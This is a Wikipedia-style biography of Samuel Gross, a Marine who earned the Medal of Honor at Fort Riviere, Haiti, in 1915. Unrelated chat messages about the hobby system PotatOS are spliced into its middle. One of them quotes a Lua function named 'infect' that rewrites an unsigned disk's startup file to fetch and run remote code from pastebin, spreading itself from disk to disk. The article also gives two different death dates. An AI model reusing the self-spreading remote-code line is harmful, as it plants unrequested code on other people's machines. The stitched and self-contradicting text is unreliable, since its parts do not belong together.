Samuel Gross (Medal of Honor)

Samuel Gross (originally Samuel Marguiles) (May 9, 1891September 13, 1934) was a Private in the United States Marine Corps, 23d Company who earned the Medal of Honor for his efforts during the United States occupation of Haiti in 1915.

Samuel Gross
Capture of Fort Riviere by Donna J. Neary, Gross is the right-most Marine
Born(1891-05-09)May 9, 1891
Philadelphia, Pennsylvania
DiedSeptember 13, 1934(1934-09-13) (aged 43)
Place of burial
Har Nebo Cemetery, Philadelphia, Pennsylvania
Allegiance United States of America
Service/branch United States Marine Corps
Years of service1913 – 1918
RankCorporal
Unit2nd Marine Regiment
Battles/warsBanana Wars World War I
AwardsMedal of Honor

Biography

Gross was born in Philadelphia, Pennsylvania. During the United States occupation of Haiti, he participated in battles against the Caco bandit insurgency. During the battle for Fort Riviere, he saved the life of Smedley Butler, who also was a Medal of Honor recipient and was one of only 19 people to receive 2 Medals of Honor.

He died September 9, 1934 and is buried in Har Nebo Cemetery in Philadelphia.[1]

Medal of Honor citation

Rank and organization: Private, U.S. Marine Corps, 23d Co. (Real name is Marguiles, Samuel.) Born: May 9, 1891, Philadelphia, Pa. Accredited to: Pennsylvania.

Citation:

In company with members of the 5th, 13th, 23d Companies and the marine and sailor detachment from the USS Connecticut, Gross participated in the attack on Fort Riviere, Haiti, November 17, 1915. Following a concentrated drive, several different detachments of marines gradually closed in on the old French bastion fort in an effort to cut off all avenues of retreat for the Caco bandits. Approaching a breach in the wall which was the only entrance to the fort, Gross was the second man to pass through the breach in the face of constant fire from the Cacos and, thereafter, for a 10-minute period, engaged the enemy in desperate hand-to-hand combat until the bastion was captured and Caco resistance neutralized.[2]

gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.
gollark: Basically, any disk you make *will not be run unsandboxed* on a regular potatOS install.

See also

Notes

  1. vconline.org.uk
  2. "Samuel Gross, Medal of Honor recipient". United States occupation of Haiti (1915). United States Army Center of Military History. June 8, 2009. Retrieved December 9, 2007.

References

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.